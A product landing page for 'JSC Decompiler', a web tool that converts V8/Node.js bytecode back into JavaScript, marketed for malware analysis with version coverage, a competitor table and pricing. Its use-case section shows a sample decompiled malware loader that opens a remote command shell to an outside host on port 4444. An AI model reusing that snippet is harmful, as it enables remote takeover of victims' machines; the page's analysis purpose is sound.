Decompile V8 Bytecode Back to JavaScript. Any Node.js Version.
Upload a .jsc file and get readable JavaScript in seconds. JSC Decompiler supports every Node.js version from Node 8 to Node 25 and Electron 17 through Electron 38.
0000C0 DE 0D 08 00 00 00 00 F5 05 00 00000CD2 04 2E 00 00 F5 A8 01 00 00 00 00001848 00 00 00 25 04 00 00 B8 03 00 0000240B 0E 12 00 00 25 02 06 18 AA 00 0B00300E 00 01 00 25 02 0B 23 03 18 00 26003C00 38 A6 00 00 00 00 FF 09 0B 0E 0D
const net = require("net");function connect(host, port) {const client = net.createConnection({ host, port },() => console.log("connected"));return client;}
C0 DE 0D 08 00 00 00 00 F5 05 00 00D2 04 2E 00 00 F5 A8 01 00 00 00 0048 00 00 00 25 04 00 00 B8 03 00 00...
const net = require("net");function connect(host, port) {// ...}
The Problem
V8-Compiled JavaScript is Everywhere.
The Tools to Analyze It Aren’t.
35,000+
malicious ads using V8 bytecode to hide payloads from security scanners.
3 Tools
all with critical limitations — version lock-in, no web access, C-like output.
Every Release
breaks existing decompilers. V8 bytecode format changes with every major Node.js version.
Try It Yourself
Upload a .jsc file (max 50KB) and see the decompiled JavaScript instantly. Free account required.
Drop your .jsc file here or click to browse
Max 100KB · Node 8–25 · Electron 17–38
Input: compiled bytecode
C0 DE 0D 08 00 00 00 00 F5 05 00 00D2 04 2E 00 00 F5 A8 01 00 00 00 0048 00 00 00 25 04 00 00 B8 03 00 000B 0E 12 00 00 25 02 06 18 AA 00 0B0E 00 01 00 25 02 0B 23 03 18 00 2600 38 A6 00 00 00 00 FF 09 0B 0E 0D1A 4C 00 25 04 0B 23 12 00 00 38 00A8 01 25 04 00 00 00 F5 0E 00 0B 230D 18 00 26 38 A6 00 0B 4C 12 00 2502 06 18 AA 00 FF 09 0E 1A 00 25 0400 00 B8 03 0B 0E 12 00 00 25 02 0618 AA 00 0B 0E 00 01 00 25 02 0B 2348 00 00 00 25 04 00 00 D2 04 2E 0003 18 00 26 00 38 A6 00 00 00 00 FF
Output: decompiled JavaScript
Upload a .jsc file above to see the decompiled JavaScript here
Features
What it does
Built for the people who actually work with this stuff.
Multi-Version Support
Works with .jsc files from Node 8 to Node 25 and Electron 17 through Electron 38. Upload any file and get results — no version configuration needed.
Instant Decompilation
Full decompilation in seconds. Upload a file and get readable JavaScript back instantly.
Zero Setup
Nothing to install. Open the web app, upload your .jsc file, get readable JavaScript back.
Clean JavaScript Output
Real control flow, reconstructed variable names, and readable function bodies. Not raw disassembly.
Built for Security
Handles obfuscated and adversarial bytecode without crashing. Built for people who analyze malware for a living.
Coverage
Every Node.js Version. Every V8 Bytecode Revision.
V8 bytecode changes between versions. Other tools break. Ours doesn't.
Versions Supported
Node 8
V8 6.x
Node 12
V8 7.x
Node 14
V8 8.x
Node 16
V8 9.x
Node 18
V8 10.x
Node 20
V8 11.x
Node 22
V8 12.x
Node 24
V8 13.x
Node 25
V8 14.1
Electron 38
V8 14.0
| Feature | JSC Decompiler | View8 | ghidra_nodejs | Manual |
|---|---|---|---|---|
| High-level decompilation | Full JS | Full JS | C-like | Disasm only |
| Multi-Node version | All versions | Limited | Limited | One version |
| Web-based / No setup | Yes | Needs patched V8 | Needs Ghidra | Needs Node/D8 |
| Commercial support | Yes | None | None | None |
| Active maintenance | Active | Sporadic | Sporadic | V8 team |
| Electron / Bytenode | Full | Partial | Yes | No |
| Price | Freemium | Free | Free | Free |
Use Cases
Real-World Applications
Analyze V8-Compiled Malware in Minutes
Malware authors have been compiling JavaScript to V8 bytecode since at least 2021 to hide payloads from security scanners. Microsoft, Check Point, and HP Wolf Security have all documented the trend — RATs, credential stealers, and over 35,000 malicious ads where the payload is bytecode, not readable script.
Upload a sample to JSC Decompiler and get readable JavaScript back. C2 communication logic, data exfiltration routines, and persistence mechanisms all become visible. What would take hours to reverse manually takes seconds.
Drop samples directly from your malware sandbox into the web app. The decompiled source drops straight into your threat intelligence workflow.
// Decompiled output from malware_loader.jscconst net = require("net");const { spawn } = require("child_process"); function connectC2(host, port) { const client = net.createConnection( { host, port }, () => { client.write(JSON.stringify({ hostname: require("os").hostname(), platform: process.platform, pid: process.pid })); } ); client.on("data", (data) => { const cmd = data.toString().trim(); const proc = spawn(cmd, { shell: false }); proc.stdout.pipe(client); });} connectC2("185.141.27.xx", 4444);Pricing
Free tier for individual use. Pay per file or go unlimited.
Community
Individual researchers, students, hobbyists
- Single-file decompilation
- Latest 2 Node versions
- Web interface
- Non-commercial use
- Community support
Single File
One-off commercial decompilation
- One .jsc file decompiled
- Standard: up to 500 KB ($200)
- Large: up to 2 MB ($500)
- All Node & Electron versions
- Commercial use included
- Email support
Enterprise
SOC teams, AppSec orgs, defense contractors
- Unlimited decompilation
- All Node versions (Node 8–25)
- Commercial license
- Floating licenses
- Dedicated instance
- Priority support (24hr)
- Custom builds available
A single outsourced decompilation job costs $2,500+. Enterprise pricing pays for itself on the first engagement.
FAQ
Frequently Asked Questions
Get Decompiled JavaScript in Under a Minute
No credit card. No setup. Upload your .jsc file and go.